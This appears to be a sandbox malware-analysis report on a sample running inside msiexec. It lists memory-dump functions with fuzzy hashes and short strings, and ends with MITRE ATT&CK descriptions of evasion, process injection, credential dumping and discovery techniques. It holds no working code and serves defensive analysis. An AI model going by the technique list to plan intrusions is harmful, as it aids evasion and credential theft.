Function 00A3D869 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef25deace7968197f8463655e3d53145fe0243e1ef1c645ad116e5b3ad7bd86
Instruction ID: ef67e3e187d1e6e318408b65f73a306c946ee08f0c3deba139b33e7485d25dce
Opcode Fuzzy Hash: 8ef25deace7968197f8463655e3d53145fe0243e1ef1c645ad116e5b3ad7bd86
Instruction Fuzzy Hash: 0B51B474E01208DFDB44DFAAD584A9DBBF2FF89300F24816AE419AB365DB31A901CF14

Function 00A341A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26d8d6b613d64a0650e99c73e68e2676a8247d26c3c089c61a2abc52f141837
Instruction ID: eb6871b9989abf840bd2420a2f066cf8128cb1be373326d376237f85081cfef1
Opcode Fuzzy Hash: e26d8d6b613d64a0650e99c73e68e2676a8247d26c3c089c61a2abc52f141837
Instruction Fuzzy Hash: C6517D74E05208DFCB48DFA9D58499DBBF2FF8D310B209169E809AB325DB35A842CF50

Function 00A35658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61515194952dea763fd96c4a69c2debcd36ccbc50ad3a0c6c117048d306ad51d
Instruction ID: ec6286ad99220b94d70ed3361c7cd7ae447db1a4fd9f0146f71e27e465468904
Opcode Fuzzy Hash: 61515194952dea763fd96c4a69c2debcd36ccbc50ad3a0c6c117048d306ad51d
Instruction Fuzzy Hash: 81317071A0564ADFCF059FA9C899ABE3FB2EF88300F144424F81597294CB39CD65DBA1

Function 00A3F4A8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87c60dc4c7fcc69d6e32c16fa168422e29435fb7a94387678acdc26d21cfd3f
Instruction ID: de87b560b340ffc03946486eb73a93b7d78560c6e12d11124896f70ca2781081
Opcode Fuzzy Hash: d87c60dc4c7fcc69d6e32c16fa168422e29435fb7a94387678acdc26d21cfd3f
Instruction Fuzzy Hash: 69319EB0D09349AFDB01DFB4D94579EBFF1BF49300F0481AAD1589B262E7744A06CB91

Function 00A328F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd1bb0bbd8a8efb352af72b07588c0423fd45828d8e661c6da788eca529d9172
Instruction ID: 4b52e698cdc9801fc4c3154fd1510752da386cb40348ef25768a47e26c973f38
Opcode Fuzzy Hash: cd1bb0bbd8a8efb352af72b07588c0423fd45828d8e661c6da788eca529d9172
Instruction Fuzzy Hash: 3E217135A002159FCB14DB28C840BBE7BB5EF9D360F61C119E8099B258DA36EE46CBD1

Function 00A0D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2528198437.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a0d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b6861fbb9a4bff9dc704c5ec03369ca16a5ae2620379ce02f1f2eca43ef12e2
Instruction ID: f45a546644dc9ef7780b5e33a792e656c26a45a082e4c97ab53492bcaa264838
Opcode Fuzzy Hash: 2b6861fbb9a4bff9dc704c5ec03369ca16a5ae2620379ce02f1f2eca43ef12e2
Instruction Fuzzy Hash: 0B21F576504308EFDB14CF60E9C4B16BBA1FB84314F20C96DE84E4B281C736D847CA62

Function 00A34285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f4226bf3872fe39a8ef11703a0f2b640101cbcfeecb5403650aca2c55216e1
Instruction ID: d1e75a54a7eb6e1c6e7f86ac76811d652077a136608913ae3934ef0de0814734
Opcode Fuzzy Hash: f4f4226bf3872fe39a8ef11703a0f2b640101cbcfeecb5403650aca2c55216e1
Instruction Fuzzy Hash: FD318C78E05308DFCB49DFA8D5949ADBBB2FF49301B209069E819AB324DB35AD05CF40

Function 00A36300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29fab1b9e1bde43d382c90187d509e5e753fe66fb397a23837fb69e03099f17f
Instruction ID: e057580de4b414fd82769a2af110ae6957085d522990ffda04ef2e217a7cec87
Opcode Fuzzy Hash: 29fab1b9e1bde43d382c90187d509e5e753fe66fb397a23837fb69e03099f17f
Instruction Fuzzy Hash: 1611A135705A11AFC7159B2EC85893EBBA6FF897517288068F806CF760CF35DC029B90

Function 00A327F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7469334daaa74efc7c5fc4b1c4372b3484ea455254e081096028fa2d1fe1836
Instruction ID: 236ec821a8d86a2c1750ca6be08b7b40e7ed5c46b5eea715c1e22d6f759f0aa9
Opcode Fuzzy Hash: e7469334daaa74efc7c5fc4b1c4372b3484ea455254e081096028fa2d1fe1836
Instruction Fuzzy Hash: 25219EB4D156098FCB01DFA9D9446EEBFF4FF09300F14516AD815B2220EB345A85DBA1

Function 00A3F4E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4486b9f9afc04d4f01830ffdba69f5127d8b0448938f5432a74754bedd2a8525
Instruction ID: 82963e0280b260bc64c45bbaed3a7888890ecb3090d6a1c7437775a5e4c939ff
Opcode Fuzzy Hash: 4486b9f9afc04d4f01830ffdba69f5127d8b0448938f5432a74754bedd2a8525
Instruction Fuzzy Hash: 52111CB0E0020DEFDB04EFB9C94579EBBF2FF48304F1085A9D1189B255EB745A068B91

Function 00A0D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2528198437.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a0d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042b7a53897df0d98a36b3ac5a7cbf217c0cc246f36523dbbdb550e319fcf960
Instruction ID: c69a2a892d094733ef827fb31b7d69deb0afb983b8e42f09ced5d28e6ba199dd
Opcode Fuzzy Hash: 042b7a53897df0d98a36b3ac5a7cbf217c0cc246f36523dbbdb550e319fcf960
Instruction Fuzzy Hash: 1C119D76504288DFCB15CF60E9C4B15BBA1FB84318F24C6ADD8494B696C33AD85ACF62

Function 00A35E72 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f704936bf6522105b8a3591f1962b64d39a748a896eb087bac934cb9e486ca0
Instruction ID: f2d24286809a992715c97026db7926d2a17e64e0a76d0e17986ef7c686de6bac
Opcode Fuzzy Hash: 9f704936bf6522105b8a3591f1962b64d39a748a896eb087bac934cb9e486ca0
Instruction Fuzzy Hash: E501B532F045596EDB119F7C9C009EF3BA6DB85B91F344425F515C7190D636CE12A790

Function 00A35EA0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909c4f471df5999e896a31a56bc2dd513f6de19a20811d9eea0e040991f7be1e
Instruction ID: f068821dc5d7e4d45e9128a653220b92fbc22b30581ffe017a05d8029961face
Opcode Fuzzy Hash: 909c4f471df5999e896a31a56bc2dd513f6de19a20811d9eea0e040991f7be1e
Instruction Fuzzy Hash: C701D472F00115ABCB15DFA98804ABE3FBBEBC8750F248026F915CB294CE758E119BD0

Function 00A3EB79 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a89f976f97ce8fed89c53d45fe925760347e713f20ba124c23ca602e15b770d
Instruction ID: 3b3178a3dfd1e1da918a4a7254c37f03daaf8c91ee01f7a775aaa96135b3c126
Opcode Fuzzy Hash: 3a89f976f97ce8fed89c53d45fe925760347e713f20ba124c23ca602e15b770d
Instruction Fuzzy Hash: CF014C79E04209DFCB01CFA8D9449AEBBB1FF89300F108166E910A3361D7385A26DF91

Function 00A328B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf240820829b9b62dd609ea473ab08ae88b35bf7d71990e36007f572d17e7a4
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: fdf240820829b9b62dd609ea473ab08ae88b35bf7d71990e36007f572d17e7a4
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Function 00A328AA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4842ff177b4fa3f83cc4d87bba8628c39f738172f9d5bb3d381593c1c2d3e1b0
Instruction ID: a97d9193b35b993d4806621074f3f393a0ed11251c00c5c9aa08749d513e274c
Opcode Fuzzy Hash: 4842ff177b4fa3f83cc4d87bba8628c39f738172f9d5bb3d381593c1c2d3e1b0
Instruction Fuzzy Hash: 88D02B35D2032686CB00EBA5DC040EDB774AEC4322B51C313C03433150FB31225DC7A0

Function 00A3AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17961fee6f020c24b5ab5efbefb8a675c4f7bb8cf27a3b7eb13b9fcb8d6843e9
Instruction ID: e09e8d6c4e75955befe7a98fb36d7f1bea66c7bf749d83b635508f1cd4a2d77b
Opcode Fuzzy Hash: 17961fee6f020c24b5ab5efbefb8a675c4f7bb8cf27a3b7eb13b9fcb8d6843e9
Instruction Fuzzy Hash: CCD0677AB000099FDB04DF98EC409DDF776FB98221B548117E915A3260C6319925DB94

Function 00A36744 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99b9f5bd479602f3ed330a2c630d0e873747d6ae1f1a5d5408e3d487704299b
Instruction ID: 5994d399ed1f887732e8335560b1962449873dfc7a3ca39dbd77a208c3ddfebe
Opcode Fuzzy Hash: d99b9f5bd479602f3ed330a2c630d0e873747d6ae1f1a5d5408e3d487704299b
Instruction Fuzzy Hash: DBD0233485C34597DB11F731DC544DC37639EC0100B104718D00109557CFBC19078B51

Function 00A36748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e67d055274ca93dd58e3286b2967fd81f271ec013c25e322a8d361c54cf589
Instruction ID: 61fb27a5ffc3dabd9d3548d408816f7391f165ba1a331552b2010ff51c242068
Opcode Fuzzy Hash: 54e67d055274ca93dd58e3286b2967fd81f271ec013c25e322a8d361c54cf589
Instruction Fuzzy Hash: 32C0C03040830DCBD300F731CC08454336FAEC06007008510E0040E509DF7C3C0287E2

Non-executed Functions

Function 00A36FC8 Relevance: 6.7, Strings: 5, Instructions: 461COMMON

Download Yara Rule

Strings

,q, xrefs: 00A37298
(oq, xrefs: 00A37212
,q, xrefs: 00A3728A
(oq, xrefs: 00A3753D
(oq, xrefs: 00A37220

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$,q$,q
API String ID: 0-189141485
Opcode ID: 0c91c9e9409f502f9b2271a067d607b58c6fd8caebff9d1abad186d5e7d71d30
Instruction ID: b9558cd2037850299d7c9b103a17fc4b78e4d6325cf03d165be6f56bda481805
Opcode Fuzzy Hash: 0c91c9e9409f502f9b2271a067d607b58c6fd8caebff9d1abad186d5e7d71d30
Instruction Fuzzy Hash: 431262B1A08219DFCB25CF69C884AADBBF2BF49300F258069F815EB261D735ED41DB51

Function 00A3F150 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

v, xrefs: 00A3F154

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: 98d62f05d88a4d5bb9e2ec1b7297a978c1e70139c1bfbb4c5b3e53f1e9d3ed03
Instruction ID: 21cb00598f0a3ec1747a1a8e1e63c7992ab9b37fa8f3223871fc00143eb021cc
Opcode Fuzzy Hash: 98d62f05d88a4d5bb9e2ec1b7297a978c1e70139c1bfbb4c5b3e53f1e9d3ed03
Instruction Fuzzy Hash: 94514474E15208DFDB14DFA9C6887EEBBB2BF89300F248129E404AB299D7759981CF54

Function 00A3F804 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79170dd178148779030d57dd82fa06d6327d4d0d9094797348d88300dabab679
Instruction ID: 551d8c13fa29ec28511db762b99e2eb69f74954106fc879a81283c6c7aed4db9
Opcode Fuzzy Hash: 79170dd178148779030d57dd82fa06d6327d4d0d9094797348d88300dabab679
Instruction Fuzzy Hash: FDC18E74E01218DFDB14DFA5C994B9DBBB2BF89300F2081A9E409AB365DB359E85CF50

Function 00A3F3BF Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2725ca64edd05a2ec42ab17befa229ed126616eacebdfcbf692824c4e6be273c
Instruction ID: d8f239cae04918b3fcf8fa411bdd1693ee2ce2bbc2906486a37aace6bd4e1443
Opcode Fuzzy Hash: 2725ca64edd05a2ec42ab17befa229ed126616eacebdfcbf692824c4e6be273c
Instruction Fuzzy Hash: 02510174D15208DFDB14DFA8C988BEEBBB2FF49300F208129E415AB295D7759981CF54

Function 00A3F33C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2221b2d590e5d2fd0ad764632a9308f9a7c8816af4ecc3f9925278b41468b3f3
Instruction ID: 32d960f039c0a9d7175b592a131c918de9f9c6c6daa117cd3c47277d2581dd9f
Opcode Fuzzy Hash: 2221b2d590e5d2fd0ad764632a9308f9a7c8816af4ecc3f9925278b41468b3f3
Instruction Fuzzy Hash: 8751EE74D15208DFDB14DFA8C588BEEBBB2FF49300F208229E415AB295C7759981CF54

Function 00A376F1 Relevance: 10.5, Strings: 8, Instructions: 474COMMON

Download Yara Rule

Strings

(oq, xrefs: 00A377E9
(oq, xrefs: 00A37C0F
,q, xrefs: 00A37B90
,q, xrefs: 00A37BA0
(oq, xrefs: 00A3772E
(oq, xrefs: 00A37815
(oq, xrefs: 00A378B2
(oq, xrefs: 00A37BFF

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 06f278314845e0e1b1980e54ab9d1233d321629bb342894dbcf59343ad8769d7
Instruction ID: de811cb3b87aa6eccb086d0ec7945dbe99b17fcbc5d335f4788676fb4d89108a
Opcode Fuzzy Hash: 06f278314845e0e1b1980e54ab9d1233d321629bb342894dbcf59343ad8769d7
Instruction Fuzzy Hash: 57126A70A042499FDB24CF69D984AAEBBF2FF49310F148599F45ADB261DB30ED41CB50

Function 00A32A69 Relevance: 5.1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

Strings

Xq, xrefs: 00A32AD8
Xq, xrefs: 00A32BA4
Xq, xrefs: 00A32B57
Xq, xrefs: 00A32A9E

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 8f60299119f2337ade37e4f742937def8b8419a09e9f6124ad96d143c64f8796
Instruction ID: 2cf7bab3666366eb28d076c087fb5444d9319f9db054cd5c177474815caa8554
Opcode Fuzzy Hash: 8f60299119f2337ade37e4f742937def8b8419a09e9f6124ad96d143c64f8796
Instruction Fuzzy Hash: 0F31A431E043199BDFB4DFA989827AFF7B6AB98300F144069D419A7341DB74CE81CB92

Function 00A36920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 00A3692C
\;q, xrefs: 00A36936
\;q, xrefs: 00A3695E
\;q, xrefs: 00A36952

Memory Dump Source

Source File: 00000009.00000002.2529528663.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_msiexec.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: a561846423bdbbdd948612e72d4adce17b675f0ca4790ceafadd415608d4f7a3
Instruction ID: 4a31f6923df8991927a966964a0386e6b1d797d12bfe4c0fdfa2891e2e461720
Opcode Fuzzy Hash: a561846423bdbbdd948612e72d4adce17b675f0ca4790ceafadd415608d4f7a3
Instruction Fuzzy Hash: 37018F31700115AFC725CB2DC440B2573F6AF897A4B29C16AF806CF370DA71DC428790

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

